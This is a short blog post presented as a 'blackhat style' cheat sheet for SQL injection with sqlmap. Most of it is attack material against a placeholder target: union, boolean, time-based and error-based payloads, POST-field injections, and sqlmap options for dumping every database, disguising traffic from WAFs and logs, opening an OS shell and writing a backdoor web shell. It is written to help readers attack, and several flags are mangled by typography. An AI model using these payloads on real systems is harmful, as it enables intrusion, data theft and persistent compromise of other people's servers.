Open in app

Sign in

Write

Sign in

Sleep
2 min readJan 15, 2025

SQLMAP PAYLOADS — BLACKHAT STYLE CHEAT SHEET

This is a basic cheat sheet for beginners I would go to the following if you want actual real payloads https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/

For those deep in the game, use these SQL payloads to own your target like a hacker.

BASIC URL INJECTIONS
Start with these to probe the weak spots
http://target.com/vuln.php?id=1' OR ‘1’=’1
http://target.com/vuln.php?id=1 UNION SELECT NULL,NULL —

Test boolean-based injections
http://target.com/vuln.php?id=1' AND ‘1’=’1
http://target.com/vuln.php?id=1' AND ‘1’=’2

Time-based delay tests
http://target.com/vuln.php?id=1' OR IF(1=1, SLEEP(5), 0) —
http://target.com/vuln.php?id=1 AND BENCHMARK(1000000, MD5(1)) —

Error-based payloads
http://target.com/vuln.php?id=1' AND UPDATEXML(1, CONCAT(0x3a, (SELECT @@version)), 1) —
http://target.com/vuln.php?id=1' AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT DATABASE()))) —

POST DATA PAYLOADS
Hit the backend hard through POST forms:
— data=”user=admin’ — &pass=test”
— data=”user=admin’ OR ‘1’=’1 — &pass=test”

Inject union selects into fields
— data=”search= UNION SELECT table_name FROM information_schema.tables — “

DATABASE DUMPS
Draining their database like it’s a leaky faucet:
Get all database names
— dbs

Get all table names from a specific database:
-D target_db — tables

Get column names from a specific table:
-D target_db -T users — columns

Dump everything from the table
-D target_db -T users -C username,password — dump

Go nuclear on everything:
— dump-all

WAF BYPASS AND STEALTH MODE
Stay under the radar
Randomize user agents to throw off their logs:
— random-agent

Proxy chains to mask your IP
— proxy=http://127.0.0.1:8080

Force a specific database backend to narrow down your payloads:
— dbms=mysql
— dbms=oracle

SYSTEM LEVEL PWNAGE
Turn SQLi into full-on system takeover
Get a shell on the target’s OS
— os-shell

Drop a backdoor for later access:
— file-write=/var/www/html/shell.php — file-dest=/var/www/html/shell.php

TIME-BASED PAYLOADS FOR THE PATIENT HACKER
Delay responses to confirm blind injections
MySQL:
1' AND IF(1=1, SLEEP(10), 0) —

PostgreSQL:
1' AND 1=1; SELECT pg_sleep(10) —

Microsoft SQL Server:
1' WAITFOR DELAY ‘0:0:10’ —

COMMON PAYLOAD STRINGS
Classic union injections:
‘ UNION SELECT 1,2,3,4 —
‘ UNION SELECT null,null,null —

Comments to end bad queries:
‘ OR ‘1’=’1' —
‘ AND ‘1’=’1' —

PRO TIPS FOR DESTRUCTION
Go loud, full level testing:
— level=5 — risk=3

Custom techniques to fit the job
— technique=T
— technique=E

Flush session logs after testing to clean up
— flush-session

Batch mode for no interruptions
— batch

Sleep
Sleep

Written by Sleep

153 Followers
41 Following

https://www.linkedin.com/in/clumsy/ https://sleepthegod.github.io

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams